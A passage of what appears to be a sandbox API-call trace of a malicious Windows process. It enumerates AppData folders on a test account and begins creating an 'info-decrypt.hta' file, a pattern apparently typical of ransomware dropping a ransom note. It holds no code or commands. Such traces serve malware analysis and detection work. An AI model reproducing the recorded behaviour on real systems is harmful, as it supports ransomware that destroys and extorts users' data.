ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.103] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0145.103] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0145.103] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe06a1240, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe06a1240, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0145.103] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949eaa4 | out: lpFindFileData=0x949eaa4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.103] FindClose (in: hFindFile=0xb7f1d0 | out: hFindFile=0xb7f1d0) returned 1 [0145.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed2c) returned 1 [0145.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed38) returned 1 [0145.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ed1c) returned 1 [0145.103] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x949e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0145.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x949e7f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpFilePart=0x0) returned 0x2c [0145.104] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x949ea44 | out: lpFindFileData=0x949ea44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f1d0 [0145.104] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.104] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0145.104] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0145.105] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0145.106] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0145.106] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0145.106] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef68f060, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xef68f060, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0145.106] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0145.106] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0145.106] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0145.107] FindClose (in: hFindFile=0xb7f1d0 | out: hFindFile=0xb7f1d0) returned 1 [0145.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ecdc) returned 1 [0145.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ece8) returned 1 [0145.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ed1c) returned 1 [0145.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x949e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0145.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x949e7f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpFilePart=0x0) returned 0x2c [0145.107] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x949ea44 | out: lpFindFileData=0x949ea44*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f1d0 [0145.107] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.107] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0145.107] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x0, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0145.108] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef68f060, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xef68f060, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0145.109] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x949ea54 | out: lpFindFileData=0x949ea54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.109] FindClose (in: hFindFile=0xb7f1d0 | out: hFindFile=0xb7f1d0) returned 1 [0145.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ecdc) returned 1 [0145.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ece8) returned 1 [0145.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x949e790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0145.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e798, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0145.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebf8) returned 1 [0145.110] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ec74 | out: lpFileInformation=0x949ec74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf4) returned 1 [0145.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x949e790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0145.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e638, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0145.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb2c) returned 1 [0145.110] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, 